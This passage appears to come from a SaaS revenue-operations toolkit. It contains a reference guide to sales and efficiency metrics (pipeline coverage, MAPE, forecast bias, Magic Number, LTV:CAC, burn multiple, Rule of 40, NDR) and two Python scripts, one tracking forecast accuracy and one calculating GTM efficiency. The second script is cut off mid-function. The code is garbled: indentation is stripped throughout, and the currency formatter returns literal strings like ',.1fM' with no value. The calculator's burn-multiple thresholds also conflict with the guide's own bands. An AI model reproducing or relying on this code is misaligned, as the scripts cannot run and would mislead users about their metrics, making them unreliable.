├── LTV:CAC Ratio
├── CAC Payback Period
├── Burn Multiple
├── Rule of 40
└── Net Dollar Retention
Level 5: Strategic Metrics (Board-Level)
├── Revenue per employee
├── Gross margin trend
├── NRR cohort analysis
└── Customer health score
```
---
## Core Metric Definitions
### Pipeline Coverage Ratio
**Formula:** Total Weighted Pipeline / Quota Target
**What it measures:** Whether there is sufficient pipeline to meet revenue targets.
**Interpretation:**
- 4x+: Strong coverage, selective deal pursuit possible
- 3-4x: Healthy coverage, standard operations
- 2-3x: At risk, accelerate pipeline generation
- <2x: Critical, immediate pipeline intervention needed
**Common Mistakes:**
- Including closed-won deals in the pipeline total
- Not weighting by stage probability
- Using annual quota against quarterly pipeline
- Ignoring deal quality in favor of quantity
**Best Practice:** Measure coverage ratio weekly. Track by quarter to identify seasonal gaps early.
---
### Stage Conversion Rates
**Formula:** # Deals advancing to Stage N+1 / # Deals entering Stage N
**What it measures:** Efficiency of progression through each pipeline stage.
**Typical SaaS Conversion Benchmarks:**
| Stage Transition | Median Rate | Top Quartile |
|-----------------|-------------|--------------|
| Lead to Qualification | 15-25% | 30%+ |
| Qualification to Proposal | 40-50% | 60%+ |
| Proposal to Negotiation | 50-60% | 70%+ |
| Negotiation to Close | 60-70% | 80%+ |
| Overall Win Rate | 15-25% | 30%+ |
**Common Mistakes:**
- Not standardizing stage exit criteria (subjective stages)
- Comparing conversion rates across different sales motions (PLG vs enterprise)
- Ignoring stage skipping (deals that jump stages inflate later conversion rates)
- Not segmenting by deal size or segment
---
### Sales Velocity
**Formula:** (# Opportunities x Avg Deal Size x Win Rate) / Avg Sales Cycle Days
**What it measures:** The rate at which the pipeline generates revenue, measured as revenue per day.
**Components:**
1. **# Opportunities** -- Volume of qualified deals in pipeline
2. **Avg Deal Size** -- Average contract value of won deals
3. **Win Rate** -- Percentage of deals that close
4. **Avg Sales Cycle** -- Days from opportunity creation to close
**Optimization levers:**
- Increase opportunity volume (marketing/SDR investment)
- Increase deal size (pricing, packaging, upsell)
- Increase win rate (sales enablement, competitive positioning)
- Decrease cycle length (champion building, MEDDPICC adherence)
**Common Mistakes:**
- Using all pipeline deals instead of qualified opportunities
- Not normalizing for segment (SMB velocity vs Enterprise velocity)
- Conflating calendar time with active selling time
- Ignoring velocity trend in favor of absolute number
---
### MAPE (Mean Absolute Percentage Error)
**Formula:** mean(|Actual - Forecast| / |Actual|) x 100
**What it measures:** Average forecast error magnitude as a percentage.
**Interpretation:**
| MAPE | Rating | Action |
|------|--------|--------|
| <10% | Excellent | Maintain current methodology |
| 10-15% | Good | Minor calibration adjustments |
| 15-25% | Fair | Methodology review needed |
| >25% | Poor | Fundamental process overhaul |
**Common Mistakes:**
- Using forecast vs. target instead of forecast vs. actual
- Not distinguishing between bias (systematic) and variance (random)
- Measuring only at the aggregate level (masks individual rep errors)
- Comparing MAPE across different time horizons (monthly vs quarterly)
---
### Forecast Bias
**Formula:** mean(Forecast - Actual) / mean(Actual) x 100
**What it measures:** Systematic tendency to over-forecast or under-forecast.
**Types:**
- **Positive bias (over-forecasting):** Forecast consistently exceeds actual. Often indicates optimistic deal assessment, insufficient qualification, or sandbagging reversal.
- **Negative bias (under-forecasting):** Actual consistently exceeds forecast. Often indicates conservative call culture, late-stage deals arriving unexpectedly, or poor pipeline visibility.
**Healthy Range:** Bias within +/- 5% of actual is considered well-calibrated.
---
### Magic Number
**Formula:** Net New ARR / Prior Period S&M Spend
**What it measures:** Efficiency of sales & marketing spend in generating new revenue.
**Interpretation:**
- >1.0: Extremely efficient, consider increasing GTM investment
- 0.75-1.0: Healthy efficiency, optimize and scale
- 0.50-0.75: Acceptable, focus on channel/spend optimization
- <0.50: Inefficient, audit spend allocation and productivity
**Common Mistakes:**
- Using total revenue instead of net new ARR
- Including expansion ARR (Magic Number measures new logo efficiency)
- Using current period spend instead of prior period (lag effect)
- Not separating sales spend from marketing spend for diagnostics
---
### LTV:CAC Ratio
**Formula:** Customer Lifetime Value / Customer Acquisition Cost
**Where:**
- LTV = (ARPA x Gross Margin) / Churn Rate
- ARPA = Average Revenue Per Account (annualized)
- CAC = Total S&M Spend / New Customers Acquired
**Target:** >3:1 is healthy; >5:1 may indicate under-investment in growth
**Common Mistakes:**
- Using revenue instead of gross-margin-weighted revenue in LTV
- Not including all acquisition costs (SDR, marketing, sales engineering)
- Using blended churn instead of cohort-specific churn
- Comparing across segments without normalizing (enterprise LTV:CAC is naturally higher)
---
### CAC Payback Period
**Formula:** CAC / (ARPA_monthly x Gross Margin)
**What it measures:** Months to recover the cost of acquiring a customer.
**Interpretation:**
- <12 months: Excellent capital efficiency
- 12-18 months: Healthy, especially for mid-market/enterprise
- 18-24 months: Acceptable for enterprise, concerning for SMB
- >24 months: Capital-intensive, needs optimization
**Common Mistakes:**
- Using revenue instead of gross-margin contribution
- Ignoring expansion revenue in payback calculation (conservative approach)
- Comparing SMB payback to enterprise payback without context
---
### Burn Multiple
**Formula:** Net Burn / Net New ARR
**What it measures:** How much cash is consumed for each dollar of new ARR.
**Interpretation (David Sacks framework):**
- <1.0x: Amazing -- hyper-efficient growth
- 1.0-1.5x: Great -- strong capital efficiency
- 1.5-2.0x: Good -- healthy burn rate
- 2.0-3.0x: Suspect -- needs attention
- >3.0x: Bad -- unsustainable without course correction
**Common Mistakes:**
- Using gross burn instead of net burn
- Not annualizing ARR when using quarterly burn
- Ignoring the denominator quality (all new ARR is not equal)
---
### Rule of 40
**Formula:** Revenue Growth Rate (%) + Free Cash Flow Margin (%)
**What it measures:** Balance between growth and profitability.
**Interpretation:**
- >60%: Elite SaaS company
- 40-60%: Strong performance
- 20-40%: Acceptable, optimize one dimension
- <20%: Needs significant improvement
**Common Mistakes:**
- Using EBITDA margin instead of FCF margin
- Comparing early-stage (growth-heavy) with late-stage (margin-heavy)
- Not considering the composition (80% growth + -40% margin vs 30% + 10%)
---
### Net Dollar Retention (NDR)
**Formula:** (Beginning ARR + Expansion - Contraction - Churn) / Beginning ARR x 100
**What it measures:** Revenue retention and expansion from existing customers.
**Interpretation:**
- >130%: World-class expansion (Snowflake, Datadog)
- 120-130%: Excellent land-and-expand
- 110-120%: Strong retention with moderate expansion
- 100-110%: Stable base, limited expansion
- <100%: Net revenue contraction -- critical concern
**Common Mistakes:**
- Including new logos in the calculation
- Not normalizing for cohort age (newer cohorts expand differently)
- Confusing gross retention with net retention
- Using logo retention as a proxy for dollar retention
---
## Metric Interdependencies
Understanding how metrics relate prevents conflicting optimizations:
1. **Magic Number and LTV:CAC** -- Both use S&M spend but measure different horizons. Magic Number is period-specific; LTV:CAC is lifetime.
2. **Burn Multiple and Rule of 40** -- Both measure efficiency but from different angles. Burn Multiple is cash-focused; Rule of 40 balances growth with profitability.
3. **Pipeline Coverage and Sales Velocity** -- High coverage with low velocity means pipeline is stagnating. Both must be healthy.
4. **NDR and LTV** -- NDR directly impacts LTV. Improving NDR is the highest-leverage way to improve LTV:CAC.
5. **Win Rate and Deal Size** -- Often inversely correlated. Moving upmarket increases deal size but may reduce win rate.
---
## Measurement Cadence
| Metric | Cadence | Owner |
|--------|---------|-------|
| Pipeline Coverage | Weekly | Sales Leadership |
| Stage Conversion | Bi-weekly | Sales Ops |
| Sales Velocity | Monthly | RevOps |
| Forecast Accuracy (MAPE) | Monthly/Quarterly | RevOps |
| Magic Number | Quarterly | CRO/CFO |
| LTV:CAC | Quarterly | Finance/RevOps |
| CAC Payback | Quarterly | Finance |
| Burn Multiple | Quarterly | CFO |
| Rule of 40 | Quarterly/Annual | CEO/Board |
| NDR | Quarterly | CS/RevOps |
FILE:scripts/forecast_accuracy_tracker.py
#!/usr/bin/env python3
"""Forecast Accuracy Tracker - Measures forecast accuracy and bias for SaaS revenue teams.
Calculates MAPE (Mean Absolute Percentage Error), detects systematic forecasting
bias, analyzes accuracy trends, and provides category-level breakdowns.
Usage:
python forecast_accuracy_tracker.py forecast_data.json --format text
python forecast_accuracy_tracker.py forecast_data.json --format json
"""
import argparse
import json
import sys
from typing import Any
def safe_divide(numerator: float, denominator: float, default: float = 0.0) -> float:
"""Safely divide two numbers, returning default if denominator is zero."""
if denominator == 0:
return default
return numerator / denominator
def calculate_mape(periods: list[dict]) -> float:
"""Calculate Mean Absolute Percentage Error.
Formula: mean(|actual - forecast| / |actual|) x 100
Args:
periods: List of dicts with 'forecast' and 'actual' keys.
Returns:
MAPE as a percentage.
"""
if not periods:
return 0.0
errors = []
for p in periods:
actual = p["actual"]
forecast = p["forecast"]
if actual != 0:
errors.append(abs(actual - forecast) / abs(actual))
if not errors:
return 0.0
return (sum(errors) / len(errors)) * 100
def calculate_weighted_mape(periods: list[dict]) -> float:
"""Calculate value-weighted MAPE.
Weights each period's error by its actual value, giving more importance
to larger periods.
Args:
periods: List of dicts with 'forecast' and 'actual' keys.
Returns:
Weighted MAPE as a percentage.
"""
if not periods:
return 0.0
total_actual = sum(abs(p["actual"]) for p in periods)
if total_actual == 0:
return 0.0
weighted_errors = 0.0
for p in periods:
actual = p["actual"]
forecast = p["forecast"]
if actual != 0:
weight = abs(actual) / total_actual
weighted_errors += weight * (abs(actual - forecast) / abs(actual))
return weighted_errors * 100
def get_accuracy_rating(mape: float) -> dict[str, str]:
"""Return accuracy rating based on MAPE threshold.
Ratings:
Excellent: <10%
Good: 10-15%
Fair: 15-25%
Poor: >25%
"""
if mape < 10:
return {"rating": "Excellent", "description": "Highly predictable, data-driven process"}
elif mape < 15:
return {"rating": "Good", "description": "Reliable forecasting with minor variance"}
elif mape < 25:
return {"rating": "Fair", "description": "Needs process improvement"}
else:
return {"rating": "Poor", "description": "Significant forecasting methodology gaps"}
def analyze_bias(periods: list[dict]) -> dict[str, Any]:
"""Analyze systematic forecasting bias.
Positive bias = over-forecasting (forecast > actual, i.e., actual fell short)
Negative bias = under-forecasting (forecast < actual, i.e., actual exceeded)
Args:
periods: List of dicts with 'forecast' and 'actual' keys.
Returns:
Bias analysis with direction, magnitude, and ratio.
"""
if not periods:
return {
"direction": "None",
"bias_pct": 0.0,
"over_forecast_count": 0,
"under_forecast_count": 0,
"exact_count": 0,
"bias_ratio": 0.0,
}
over_count = 0
under_count = 0
exact_count = 0
total_bias = 0.0
for p in periods:
diff = p["forecast"] - p["actual"]
total_bias += diff
if diff > 0:
over_count += 1
elif diff < 0:
under_count += 1
else:
exact_count += 1
avg_bias = total_bias / len(periods)
total_actual = sum(p["actual"] for p in periods)
bias_pct = safe_divide(total_bias, total_actual) * 100
if over_count > under_count:
direction = "Over-forecasting"
elif under_count > over_count:
direction = "Under-forecasting"
else:
direction = "Balanced"
bias_ratio = safe_divide(over_count, over_count + under_count)
return {
"direction": direction,
"avg_bias_amount": round(avg_bias, 2),
"bias_pct": round(bias_pct, 1),
"over_forecast_count": over_count,
"under_forecast_count": under_count,
"exact_count": exact_count,
"bias_ratio": round(bias_ratio, 2),
}
def analyze_trend(periods: list[dict]) -> dict[str, Any]:
"""Analyze period-over-period accuracy trend.
Determines if forecast accuracy is improving, stable, or declining
by comparing error rates across consecutive periods.
Args:
periods: List of dicts with 'period', 'forecast', and 'actual' keys.
Returns:
Trend analysis with direction and period details.
"""
if len(periods) < 2:
return {
"trend": "Insufficient data",
"period_errors": [],
"improving_periods": 0,
"declining_periods": 0,
}
period_errors = []
for p in periods:
actual = p["actual"]
forecast = p["forecast"]
if actual != 0:
error_pct = abs(actual - forecast) / abs(actual) * 100
else:
error_pct = 0.0
period_errors.append({
"period": p.get("period", "Unknown"),
"error_pct": round(error_pct, 1),
"forecast": forecast,
"actual": actual,
})
improving = 0
declining = 0
for i in range(1, len(period_errors)):
if period_errors[i]["error_pct"] < period_errors[i - 1]["error_pct"]:
improving += 1
elif period_errors[i]["error_pct"] > period_errors[i - 1]["error_pct"]:
declining += 1
if improving > declining:
trend = "Improving"
elif declining > improving:
trend = "Declining"
else:
trend = "Stable"
# Calculate recent vs historical MAPE
midpoint = len(periods) // 2
if midpoint > 0:
early_mape = calculate_mape(periods[:midpoint])
recent_mape = calculate_mape(periods[midpoint:])
mape_change = recent_mape - early_mape
else:
early_mape = 0.0
recent_mape = 0.0
mape_change = 0.0
return {
"trend": trend,
"period_errors": period_errors,
"improving_periods": improving,
"declining_periods": declining,
"early_mape": round(early_mape, 1),
"recent_mape": round(recent_mape, 1),
"mape_change": round(mape_change, 1),
}
def analyze_categories(category_breakdowns: dict) -> dict[str, Any]:
"""Analyze accuracy by category (rep, product, segment, etc.).
Args:
category_breakdowns: Dict of category_name -> list of
{category, forecast, actual} dicts.
Returns:
Category-level MAPE and accuracy analysis.
"""
results = {}
for category_name, entries in category_breakdowns.items():
category_results = []
for entry in entries:
actual = entry["actual"]
forecast = entry["forecast"]
if actual != 0:
error_pct = abs(actual - forecast) / abs(actual) * 100
else:
error_pct = 0.0
diff = forecast - actual
if diff > 0:
bias = "Over"
elif diff < 0:
bias = "Under"
else:
bias = "Exact"
rating = get_accuracy_rating(error_pct)
category_results.append({
"category": entry["category"],
"forecast": forecast,
"actual": actual,
"error_pct": round(error_pct, 1),
"bias": bias,
"variance": round(diff, 2),
"rating": rating["rating"],
})
# Sort by error percentage (worst first)
category_results.sort(key=lambda x: x["error_pct"], reverse=True)
overall_mape = calculate_mape(entries)
results[category_name] = {
"entries": category_results,
"overall_mape": round(overall_mape, 1),
"overall_rating": get_accuracy_rating(overall_mape)["rating"],
}
return results
def generate_recommendations(
mape: float, bias: dict, trend: dict, categories: dict
) -> list[str]:
"""Generate actionable recommendations based on analysis results.
Args:
mape: Overall MAPE percentage.
bias: Bias analysis results.
trend: Trend analysis results.
categories: Category analysis results.
Returns:
List of recommendation strings.
"""
recommendations = []
# MAPE-based recommendations
if mape > 25:
recommendations.append(
"CRITICAL: MAPE exceeds 25%. Implement structured forecasting methodology "
"(e.g., weighted pipeline with stage-based probabilities)."
)
elif mape > 15:
recommendations.append(
"Forecast accuracy needs improvement. Consider implementing deal-level "
"forecasting with commit/upside/pipeline categories."
)
# Bias-based recommendations
if bias["direction"] == "Over-forecasting" and abs(bias["bias_pct"]) > 10:
recommendations.append(
f"Systematic over-forecasting detected ({bias['bias_pct']}% bias). "
"Review deal qualification criteria and apply more conservative "
"stage probabilities."
)
elif bias["direction"] == "Under-forecasting" and abs(bias["bias_pct"]) > 10:
recommendations.append(
f"Systematic under-forecasting detected ({bias['bias_pct']}% bias). "
"Review upside deals more carefully and improve pipeline visibility."
)
# Trend-based recommendations
if trend["trend"] == "Declining":
recommendations.append(
"Forecast accuracy is declining over time. Schedule a forecasting "
"methodology review and retrain the team on forecasting best practices."
)
elif trend["trend"] == "Improving":
recommendations.append(
"Forecast accuracy is improving. Continue current methodology and "
"document best practices for consistency."
)
# Category-based recommendations
for cat_name, cat_data in categories.items():
worst_entries = [
e for e in cat_data["entries"] if e["error_pct"] > 25
]
if worst_entries:
names = ", ".join(e["category"] for e in worst_entries[:3])
recommendations.append(
f"High error rates in {cat_name}: {names}. "
f"Provide targeted coaching on forecasting discipline."
)
if not recommendations:
recommendations.append(
"Forecasting performance is strong. Maintain current processes "
"and continue monitoring for drift."
)
return recommendations
def track_forecast_accuracy(data: dict) -> dict[str, Any]:
"""Run complete forecast accuracy analysis.
Args:
data: Forecast data with periods and optional category breakdowns.
Returns:
Complete forecast accuracy analysis results.
"""
periods = data["forecast_periods"]
mape = calculate_mape(periods)
weighted_mape = calculate_weighted_mape(periods)
rating = get_accuracy_rating(mape)
bias = analyze_bias(periods)
trend = analyze_trend(periods)
categories = {}
if "category_breakdowns" in data:
categories = analyze_categories(data["category_breakdowns"])
recommendations = generate_recommendations(mape, bias, trend, categories)
return {
"mape": round(mape, 1),
"weighted_mape": round(weighted_mape, 1),
"accuracy_rating": rating,
"bias": bias,
"trend": trend,
"category_breakdowns": categories,
"recommendations": recommendations,
"periods_analyzed": len(periods),
}
def format_currency(value: float) -> str:
"""Format a number as currency."""
if abs(value) >= 1_000_000:
return f",.1fM"
elif abs(value) >= 1_000:
return f",.1fK"
return f",.0f"
def format_text_report(results: dict) -> str:
"""Format analysis results as a human-readable text report."""
lines = []
lines.append("=" * 70)
lines.append("FORECAST ACCURACY REPORT")
lines.append("=" * 70)
# Overall accuracy
lines.append("")
lines.append("OVERALL ACCURACY")
lines.append("-" * 40)
lines.append(f" MAPE: {results['mape']}%")
lines.append(f" Weighted MAPE: {results['weighted_mape']}%")
lines.append(f" Rating: {results['accuracy_rating']['rating']}")
lines.append(f" Assessment: {results['accuracy_rating']['description']}")
lines.append(f" Periods Analyzed: {results['periods_analyzed']}")
# Bias analysis
bias = results["bias"]
lines.append("")
lines.append("FORECAST BIAS")
lines.append("-" * 40)
lines.append(f" Direction: {bias['direction']}")
lines.append(f" Bias %: {bias['bias_pct']}%")
lines.append(f" Avg Bias Amount: {format_currency(bias['avg_bias_amount'])}")
lines.append(f" Over-forecast: {bias['over_forecast_count']} periods")
lines.append(f" Under-forecast: {bias['under_forecast_count']} periods")
lines.append(f" Bias Ratio: {bias['bias_ratio']}")
# Trend analysis
trend = results["trend"]
lines.append("")
lines.append("ACCURACY TREND")
lines.append("-" * 40)
lines.append(f" Trend: {trend['trend']}")
lines.append(f" Improving: {trend['improving_periods']} periods")
lines.append(f" Declining: {trend['declining_periods']} periods")
if trend.get("early_mape") is not None and trend["trend"] != "Insufficient data":
lines.append(f" Early MAPE: {trend['early_mape']}%")
lines.append(f" Recent MAPE: {trend['recent_mape']}%")
lines.append(f" MAPE Change: {trend['mape_change']:+.1f}%")
if trend.get("period_errors"):
lines.append("")
lines.append(" PERIOD DETAIL:")
for pe in trend["period_errors"]:
lines.append(
f" {pe['period']:12s} "
f"Forecast: {format_currency(pe['forecast']):>10s} "
f"Actual: {format_currency(pe['actual']):>10s} "
f"Error: {pe['error_pct']}%"
)
# Category breakdowns
if results["category_breakdowns"]:
lines.append("")
lines.append("CATEGORY BREAKDOWN")
lines.append("-" * 40)
for cat_name, cat_data in results["category_breakdowns"].items():
lines.append(
f"\n {cat_name.upper()} (Overall MAPE: {cat_data['overall_mape']}% "
f"- {cat_data['overall_rating']})"
)
for entry in cat_data["entries"]:
lines.append(
f" {entry['category']:20s} "
f"Error: {entry['error_pct']:5.1f}% "
f"Bias: {entry['bias']:5s} "
f"Rating: {entry['rating']}"
)
# Recommendations
lines.append("")
lines.append("RECOMMENDATIONS")
lines.append("-" * 40)
for i, rec in enumerate(results["recommendations"], 1):
lines.append(f" {i}. {rec}")
lines.append("")
lines.append("=" * 70)
return "\n".join(lines)
def main() -> None:
"""Main entry point for forecast accuracy tracker CLI."""
parser = argparse.ArgumentParser(
description="Track and analyze forecast accuracy for SaaS revenue teams."
)
parser.add_argument(
"input",
help="Path to JSON file containing forecast data",
)
parser.add_argument(
"--format",
choices=["json", "text"],
default="text",
help="Output format: json or text (default: text)",
)
args = parser.parse_args()
try:
with open(args.input, "r") as f:
data = json.load(f)
except FileNotFoundError:
print(f"Error: File not found: {args.input}", file=sys.stderr)
sys.exit(1)
except json.JSONDecodeError as e:
print(f"Error: Invalid JSON in {args.input}: {e}", file=sys.stderr)
sys.exit(1)
if "forecast_periods" not in data:
print("Error: Missing required field 'forecast_periods' in input data", file=sys.stderr)
sys.exit(1)
results = track_forecast_accuracy(data)
if args.format == "json":
print(json.dumps(results, indent=2))
else:
print(format_text_report(results))
if __name__ == "__main__":
main()
FILE:scripts/gtm_efficiency_calculator.py
#!/usr/bin/env python3
"""GTM Efficiency Calculator - Calculates go-to-market efficiency metrics for SaaS.
Computes Magic Number, LTV:CAC, CAC Payback, Burn Multiple, Rule of 40,
and Net Dollar Retention with industry benchmarking and ratings.
Usage:
python gtm_efficiency_calculator.py gtm_data.json --format text
python gtm_efficiency_calculator.py gtm_data.json --format json
"""
import argparse
import json
import sys
from typing import Any
def safe_divide(numerator: float, denominator: float, default: float = 0.0) -> float:
"""Safely divide two numbers, returning default if denominator is zero."""
if denominator == 0:
return default
return numerator / denominator
# --- Benchmark tables ---
# Each benchmark defines green/yellow/red thresholds
# and optional percentile placement guidance
BENCHMARKS = {
"magic_number": {
"green": {"min": 0.75, "label": ">0.75 - Efficient GTM spend"},
"yellow": {"min": 0.50, "max": 0.75, "label": "0.50-0.75 - Acceptable efficiency"},
"red": {"max": 0.50, "label": "<0.50 - Inefficient GTM spend"},
"elite": 1.0,
"description": "Net New ARR / Prior Period S&M Spend",
},
"ltv_cac_ratio": {
"green": {"min": 3.0, "label": ">3:1 - Strong unit economics"},
"yellow": {"min": 1.0, "max": 3.0, "label": "1:1-3:1 - Marginal unit economics"},
"red": {"max": 1.0, "label": "<1:1 - Unsustainable unit economics"},
"elite": 5.0,
"description": "Customer LTV / Customer Acquisition Cost",
},
"cac_payback_months": {
"green": {"max": 18, "label": "<18 months - Healthy payback"},
"yellow": {"min": 18, "max": 24, "label": "18-24 months - Acceptable payback"},
"red": {"min": 24, "label": ">24 months - Capital intensive"},
"elite": 12,
"description": "CAC / (ARPA x Gross Margin) in months",
},
"burn_multiple": {
"green": {"max": 2.0, "label": "<2x - Capital efficient growth"},
"yellow": {"min": 2.0, "max": 4.0, "label": "2-4x - Moderate burn"},
"red": {"min": 4.0, "label": ">4x - Unsustainable burn"},
"elite": 1.0,
"description": "Net Burn / Net New ARR",
},
"rule_of_40": {
"green": {"min": 40, "label": ">40% - Strong balance of growth & profitability"},
"yellow": {"min": 20, "max": 40, "label": "20-40% - Acceptable balance"},
"red": {"max": 20, "label": "<20% - Needs improvement"},
"elite": 60,
"description": "Revenue Growth % + FCF Margin %",
},
"ndr_pct": {
"green": {"min": 110, "label": ">110% - Strong expansion revenue"},
"yellow": {"min": 100, "max": 110, "label": "100-110% - Stable base"},
"red": {"max": 100, "label": "<100% - Net revenue contraction"},
"elite": 130,
"description": "(Begin ARR + Expansion - Contraction - Churn) / Begin ARR",
},
}
def rate_metric(metric_name: str, value: float) -> dict[str, str]:
"""Rate a metric as Green/Yellow/Red based on benchmark thresholds.
Args:
metric_name: Key into BENCHMARKS dict.
value: The metric value to rate.
Returns:
Dict with rating color, label, and percentile guidance.
"""
bench = BENCHMARKS.get(metric_name)
if not bench:
return {"rating": "Unknown", "label": "No benchmark available"}
# For metrics where lower is better (cac_payback, burn_multiple)
lower_is_better = metric_name in ("cac_payback_months", "burn_multiple")
if lower_is_better:
if "max" in bench["green"] and value <= bench["green"]["max"]:
rating = "Green"
label = bench["green"]["label"]
elif "min" in bench.get("yellow", {}) and "max" in bench.get("yellow", {}):
if bench["yellow"]["min"] <= value <= bench["yellow"]["max"]:
rating = "Yellow"
label = bench["yellow"]["label"]
else:
rating = "Red"
label = bench["red"]["label"]
else:
rating = "Red"
label = bench["red"]["label"]
else:
if "min" in bench["green"] and value >= bench["green"]["min"]:
rating = "Green"
label = bench["green"]["label"]
elif "min" in bench.get("yellow", {}) and "max" in bench.get("yellow", {}):
if bench["yellow"]["min"] <= value <= bench["yellow"]["max"]:
rating = "Yellow"
label = bench["yellow"]["label"]
else:
rating = "Red"
label = bench["red"]["label"]
else:
rating = "Red"
label = bench["red"]["label"]
# Percentile placement (simplified)
elite = bench.get("elite", 0)
if lower_is_better:
if elite > 0 and value > 0:
if value <= elite:
percentile = "Top 10%"
elif rating == "Green":
percentile = "Top 25%"
elif rating == "Yellow":
percentile = "Median"
else:
percentile = "Below median"
else:
percentile = "N/A"
else:
if elite > 0:
if value >= elite:
percentile = "Top 10%"
elif rating == "Green":
percentile = "Top 25%"
elif rating == "Yellow":
percentile = "Median"
else:
percentile = "Below median"
else:
percentile = "N/A"
return {
"rating": rating,
"label": label,
"percentile": percentile,
}
def calculate_magic_number(net_new_arr: float, sm_spend: float) -> dict[str, Any]:
"""Calculate Magic Number.
Formula: Net New ARR / Prior Period S&M Spend
Target: >0.75
Args:
net_new_arr: Net new annual recurring revenue in the period.
sm_spend: Sales & marketing spend in the prior period.
Returns:
Magic number value with rating and benchmark.
"""
value = safe_divide(net_new_arr, sm_spend)
benchmark = rate_metric("magic_number", value)
return {
"value": round(value, 2),
"net_new_arr": net_new_arr,
"sm_spend": sm_spend,
"formula": "Net New ARR / Prior Period S&M Spend",
"target": ">0.75",
**benchmark,
}
def calculate_ltv_cac(
arpa_monthly: float,
gross_margin_pct: float,
annual_churn_rate_pct: float,
cac: float,
) -> dict[str, Any]:
"""Calculate LTV:CAC Ratio.
LTV = ARPA_monthly x 12 x Gross Margin / Annual Churn Rate
Ratio = LTV / CAC
Target: >3:1
Args:
arpa_monthly: Average revenue per account per month.
gross_margin_pct: Gross margin as percentage (e.g., 78 for 78%).
annual_churn_rate_pct: Annual churn rate as percentage (e.g., 8 for 8%).
cac: Customer acquisition cost.
Returns:
LTV:CAC ratio with component values, rating, and benchmark.
"""
gross_margin = gross_margin_pct / 100
churn_rate = annual_churn_rate_pct / 100
arpa_annual = arpa_monthly * 12
ltv = safe_divide(arpa_annual * gross_margin, churn_rate)
ratio = safe_divide(ltv, cac)
benchmark = rate_metric("ltv_cac_ratio", ratio)
return {
"ratio": round(ratio, 1),
"ltv": round(ltv, 2),
"cac": cac,
"arpa_monthly": arpa_monthly,
"arpa_annual": arpa_annual,
"gross_margin_pct": gross_margin_pct,
"annual_churn_rate_pct": annual_churn_rate_pct,
"formula": "LTV (ARPA x Gross Margin / Churn Rate) / CAC",
"target": ">3:1",
**benchmark,
}
def calculate_cac_payback(
cac: float, arpa_monthly: float, gross_margin_pct: float
) -> dict[str, Any]:
"""Calculate CAC Payback Period.
Formula: CAC / (ARPA_monthly x Gross Margin) in months
Target: <18 months
Args:
cac: Customer acquisition cost.
arpa_monthly: Average revenue per account per month.
gross_margin_pct: Gross margin as percentage.
Returns:
CAC payback months with rating and benchmark.
"""
gross_margin = gross_margin_pct / 100
monthly_contribution = arpa_monthly * gross_margin
payback_months = safe_divide(cac, monthly_contribution)
benchmark = rate_metric("cac_payback_months", payback_months)
return {
"months": round(payback_months, 1),
"cac": cac,
"arpa_monthly": arpa_monthly,
"gross_margin_pct": gross_margin_pct,
"monthly_contribution": round(monthly_contribution, 2),
"formula": "CAC / (ARPA_monthly x Gross Margin)",
"target": "<18 months",
**benchmark,
}
def calculate_burn_multiple(net_burn: float, net_new_arr: float) -> dict[str, Any]:
"""Calculate Burn Multiple.
Formula: Net Burn / Net New ARR
Target: <2x (lower is better)
Args:
net_burn: Net cash burn in the period.
net_new_arr: Net new ARR added in the period.
Returns:
Burn multiple with rating and benchmark.
"""
value = safe_divide(net_burn, net_new_arr)
benchmark = rate_metric("burn_multiple", value)
return {
"value": round(value, 2),
"net_burn": net_burn,
"net_new_arr": net_new_arr,
"formula": "Net Burn / Net New ARR",
"target": "<2x",
**benchmark,
}
def calculate_rule_of_40(
revenue_growth_pct: float, fcf_margin_pct: float
) -> dict[str, Any]:
"""Calculate Rule of 40.
Formula: Revenue Growth % + FCF Margin %
Target: >40%
Args:
revenue_growth_pct: Year-over-year revenue growth percentage.
fcf_margin_pct: Free cash flow margin percentage.
Returns:
Rule of 40 score with rating and benchmark.
"""
value = revenue_growth_pct + fcf_margin_pct
benchmark = rate_metric("rule_of_40", value)
return {
"value": round(value, 1),
"revenue_growth_pct": revenue_growth_pct,
"fcf_margin_pct": fcf_margin_pct,
"formula": "Revenue Growth % + FCF Margin %",
"target": ">40%",
**benchmark,
}
def calculate_ndr(
beginning_arr: float,
expansion_arr: float,
contraction_arr: float,
churned_arr: float,
) -> dict[str, Any]:
"""Calculate Net Dollar Retention.
Formula: (Beginning ARR + Expansion - Contraction - Churn) / Beginning ARR
Target: >110%
Args:
beginning_arr: ARR at start of period.
expansion_arr: Expansion revenue from existing customers.
contraction_arr: Revenue lost from downgrades.
churned_arr: Revenue lost from customer churn.
Returns:
NDR percentage with rating and benchmark.
"""
ending_arr = beginning_arr + expansion_arr - contraction_arr - churned_arr
ndr_pct = safe_divide(ending_arr, beginning_arr) * 100
benchmark = rate_metric("ndr_pct", ndr_pct)
return {
"ndr_pct": round(ndr_pct, 1),
"beginning_arr": beginning_arr,
"expansion_arr": expansion_arr,
"contraction_arr": contraction_arr,
"churned_arr": churned_arr,
"ending_arr": round(ending_arr, 2),
"formula": "(Begin ARR + Expansion - Contraction - Churn) / Begin ARR",
"target": ">110%",
**benchmark,
}
def generate_recommendations(metrics: dict) -> list[str]:
"""Generate strategic recommendations based on GTM efficiency metrics.
Args:
metrics: Dict of all calculated metric results.
Returns:
List of recommendation strings.
"""
recs = []
# Magic Number
mn = metrics["magic_number"]
if mn["rating"] == "Red":
recs.append(
f"Magic Number is {mn['value']} (target >0.75). GTM spend is inefficient. "
"Audit channel ROI, optimize sales productivity, and consider reducing "
"low-performing spend."
)
elif mn["rating"] == "Yellow":
recs.append(
f"Magic Number is {mn['value']}. GTM efficiency is acceptable but can improve. "
"Focus on sales enablement and pipeline quality over quantity."
)
# LTV:CAC
lc = metrics["ltv_cac"]
if lc["rating"] == "Red":
recs.append(
f"LTV:CAC ratio is {lc['ratio']}:1 (target >3:1). Unit economics are unsustainable. "
"Reduce CAC through better targeting, improve retention to increase LTV, "
"or increase ARPA through pricing optimization."
)
elif lc["rating"] == "Yellow":
recs.append(
f"LTV:CAC ratio is {lc['ratio']}:1. Unit economics are marginal. "
"Focus on reducing churn and expanding within existing accounts."
)
# CAC Payback
cp = metrics["cac_payback"]
if cp["rating"] == "Red":
recs.append(
f"CAC payback is {cp['months']} months (target <18). Capital recovery is too slow. "
"Reduce acquisition costs or increase gross-margin-weighted ARPA."
)
# Burn Multiple
bm = metrics["burn_multiple"]
if bm["rating"] == "Red":
recs.append(
f"Burn multiple is {bm['value']}x (target <2x). Cash consumption relative to "
"growth is unsustainable. Prioritize operating efficiency and path to profitability."
)
# Rule of 40
r40 = metrics["rule_of_40"]
if r40["rating"] == "Red":
recs.append(
